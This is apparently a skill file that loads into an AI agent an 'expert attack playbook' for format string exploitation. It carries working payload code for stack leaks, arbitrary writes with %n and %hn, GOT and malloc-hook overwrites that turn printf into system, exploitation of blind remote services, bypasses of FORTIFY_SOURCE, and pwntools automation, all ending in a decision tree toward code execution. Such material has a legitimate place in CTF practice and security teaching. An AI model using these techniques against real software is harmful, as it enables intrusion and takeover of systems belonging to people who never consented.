SKILL: Format String Exploitation — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.
0. RELATED ROUTING
- stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
- binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
- arbitrary-write-to-rce — convert format string write primitive to code execution targets
- heap-exploitation — heap address leak via format string for heap exploitation
1. VULNERABILITY IDENTIFICATION
Vulnerable Pattern
printf(user_input); // VULNERABLE: user controls format string
fprintf(fp, user_input); // VULNERABLE
sprintf(buf, user_input); // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE
printf("%s", user_input); // SAFE: format string is fixed
Quick Test
Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset
2. READING MEMORY
Stack Leak (%p)
| Format | Action | Use |
|---|---|---|
%p | Print next stack value as pointer | Sequential stack dump |
%N$p | Print N-th parameter as pointer | Direct positional access |
%N$lx | Same as %p but explicit hex (64-bit) | Portable |
%N$s | Dereference N-th parameter as string pointer | Read memory at pointer value |
Finding Your Input Offset
# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
# ↑ offset = 6 (example)
# Or automated:
for i in range(1, 30):
io.sendline(f'AAAA%{i}$p')
if '0x41414141' in io.recvline():
print(f'Offset = {i}')
break
Leaking Specific Values
| Target | Method | Stack Position |
|---|---|---|
| Canary | %N$p where N = canary offset from format string | Typically at offset buf_size/8 + few |
| Saved RBP | %N$p (just above return address) | Leaks stack address → stack base |
| Return address | %N$p | Leaks .text address (PIE base = leak & ~0xfff - offset) |
| Libc address | %N$p where N points to __libc_start_main+XX return on stack | libc base = leak - offset |
Reading Arbitrary Address (%s)
# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack
# 64-bit: address contains null bytes → place AFTER format specifiers
payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is
3. WRITING MEMORY (%n)
Write Specifiers
| Specifier | Bytes Written | Width |
|---|---|---|
%n | 4 bytes (int) | Characters printed so far |
%hn | 2 bytes (short) | Characters printed so far (mod 0x10000) |
%hhn | 1 byte (char) | Characters printed so far (mod 0x100) |
%ln | 8 bytes (long) | Characters printed so far |
Arbitrary Write Technique
Goal: Write value V to address A.
32-bit (address on stack directly):
# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload = p32(target_addr) # for low 2 bytes
payload += p32(target_addr + 2) # for high 2 bytes
# Calculate padding for each %hn write
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
64-bit (address AFTER format string):
# Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string
# Solution: place addresses AFTER the format specifiers
# Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
Byte-by-Byte Write with %hhn
Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):
writes = {}
for i in range(6):
byte_val = (value >> (i * 8)) & 0xff
writes[target_addr + i] = byte_val
# pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
4. PWNTOOLS fmtstr_payload()
from pwn import *
# Overwrite GOT entry with target address
payload = fmtstr_payload(
offset, # stack offset where input appears
{elf.got['printf']: libc.symbols['system']}, # {addr: value}
numbwritten=0, # bytes already output before our input
write_size='short' # 'byte', 'short', or 'int'
)
# For 64-bit with addresses after format string:
# fmtstr_payload handles this automatically
FmtStr Class (Interactive Exploitation)
from pwn import *
def send_payload(payload):
io.sendline(payload)
return io.recvline()
fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
5. GOT OVERWRITE VIA FORMAT STRING
Common Targets
| Overwrite | With | Trigger |
|---|---|---|
printf@GOT | system | Next printf(user_input) → system(user_input), send /bin/sh |
strlen@GOT | system | If strlen(user_input) called |
puts@GOT | system | If puts(user_input) called |
atoi@GOT | system | If atoi(user_input) called (send sh as "number") |
__stack_chk_fail@GOT | Controlled addr | Bypass canary check entirely |
exit@GOT | main | Create infinite loop for multi-shot exploit |
Hook Targets (glibc < 2.34)
| Target | One-gadget | Trigger |
|---|---|---|
__malloc_hook | one_gadget addr | Any printf with large format → internal malloc |
__free_hook | system | Trigger free("/bin/sh") |
6. STACK POINTER CHAIN EXPLOITATION
When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.
Two-Stage Write
Stack:
[offset A] → ptr_X (stack address pointing to another stack address)
[offset B] → ptr_Y (target of ptr_X)
Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr
This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).
Finding Pointer Chains
# Leak stack with %p, look for:
# 1. Stack address A at offset N that points to another stack address B
# 2. Stack address B at offset M
# Modify value at A (using %N$hn) to change where B points
# Then write through B (using %M$hn) to target
7. BLIND FORMAT STRING
Remote service, no binary, no source — exploit format string blind.
Methodology
| Step | Action | Purpose |
|---|---|---|
| 1 | Send %p × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send AAAA%N$p for N=1..50, find 0x41414141 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via %N$s with GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | %n to rewrite GOT entry with system address |
8. FORTIFY_SOURCE BYPASS
FORTIFY_SOURCE (gcc -D_FORTIFY_SOURCE=2) replaces printf with __printf_chk which forbids %N$n (positional writes).
Bypass Techniques
| Method | Detail |
|---|---|
Use %hn sequentially (no positional) | Print exact byte count, %hn, adjust, %hn — fragile but works |
| Stack-based exploit | If format string is on stack, use non-positional %n with stack position control |
| Heap overflow instead | FORTIFY doesn't protect heap — combine with heap bug |
| Return-to-printf | ROP to call unfortified printf (if available in binary or libc) |
9. 64-BIT CONSIDERATIONS
| Challenge | Solution |
|---|---|
Addresses contain \x00 (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × %hn (2 bytes each) or 6 × %hhn |
| Larger stack offset range | Input may be at offset 6+ due to 6 register args saved |
| 48-bit address space | Only bottom 48 bits of 64-bit used |
Layout Template (64-bit)
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
← no null bytes here → ← null bytes OK (after fmt) →
10. DECISION TREE
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│ ├── YES → positional %n blocked
│ │ ├── Sequential %n possible? → non-positional write
│ │ └── Combine with another primitive (heap, ROP)
│ └── NO → full positional %n available
├── What do you need first?
│ ├── Leak canary → %N$p at canary stack offset
│ ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│ ├── Leak libc base → %N$p at __libc_start_main return on stack
│ ├── Leak heap base → %N$p at heap pointer on stack
│ └── Leak specific address → %N$s with target address on stack
├── Architecture?
│ ├── 32-bit → addresses at start of format string
│ └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│ ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│ ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│ ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│ └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│ ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│ └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
└── Use stack pointer chains for indirect writes